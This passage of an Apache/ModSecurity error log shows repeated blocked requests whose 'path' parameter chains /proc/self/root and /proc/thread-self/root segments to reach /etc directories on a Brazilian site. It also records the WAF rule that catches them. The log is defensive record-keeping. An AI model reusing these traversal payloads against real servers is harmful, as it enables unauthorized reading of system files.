"abxIOpJaM1-0uhhUQJM9CgAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:20.436784 2026] [:error] [pid 21563:tid 140411548894976] [client 74.7.243.128:42682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIPEpm7ZmxKZTM4bZo3QAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:21.835334 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.243.128:42692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIPfqxLDW4GITHUkSNVQAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:23.026444 2026] [mime_magic:error] [pid 17887:tid 140411641214720] (70014)End of file found: [client 74.7.241.31:51836] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run
[Thu Mar 19 16:02:24.679324 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.243.128:42708] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIQPqxLDW4GITHUkSNXAAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:26.120681 2026] [:error] [pid 7545:tid 140411540502272] [client 74.7.243.128:42718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIQn8B84UptSoTJtY0WQAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:27.747054 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.243.128:42732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIQ_-YZRR_7pZ7nDKvKQAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:29.209999 2026] [:error] [pid 5816:tid 140411641214720] [client 74.7.243.128:42734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIRZfmNfuxceSuAEK5sgAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:30.623078 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.243.128:47910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIRvu8EFLIOrSqIpvNogAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:31.942254 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:47912] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIRxCii7xarUs8iHYOeAAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:34.661167 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:47926] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxISfqxLDW4GITHUkSNYAAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:37.003165 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:47926] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIS_qxLDW4GITHUkSNYgAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:38.978419 2026] [:error] [pid 20435:tid 140411574073088] [client 74.7.243.128:47940] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxITpJaM1-0uhhUQJM9FgAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:40.611096 2026] [:error] [pid 27293:tid 140411616036608] [client 74.7.243.128:38432] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIUP-YZRR_7pZ7nDKvLwAAA88"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:41.129854 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:50360] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:02:44.464239 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:38438] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIVAkwaGbbGflqUZDvpQAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:46.941638 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:38440] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIVvu8EFLIOrSqIpvNrQAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:49.175331 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:38448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIWcdf6f5d65gmYZSfbwAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:51.350916 2026] [:error] [pid 7545:tid 140411716749056] [client 74.7.243.128:53486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIW38B84UptSoTJtY0aAAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:53.723348 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.243.128:53492] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIXRCii7xarUs8iHYOhQAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:55.966799 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:53504] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIX_u8EFLIOrSqIpvNsQAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:58.141889 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:53506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIYsdf6f5d65gmYZSfdwAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:03:00.528060 2026] [mime_magic:error] [pid 20435:tid 140411674785536] (70014)End of file found: [client 57.141.18.2:54400] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 16:03:00.731355 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:60910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIZMdf6f5d65gmYZSfeAAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:03:04.552405 2026] [:error] [pid 5816:tid 140411708356352] [client 74.7.243.128:60916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIaJfmNfuxceSuAEK5xQAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:03:08.113857 2026] [proxy_fcgi:error] [pid 5816:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:51216] AH01075: Error dispatching request to : (polling)
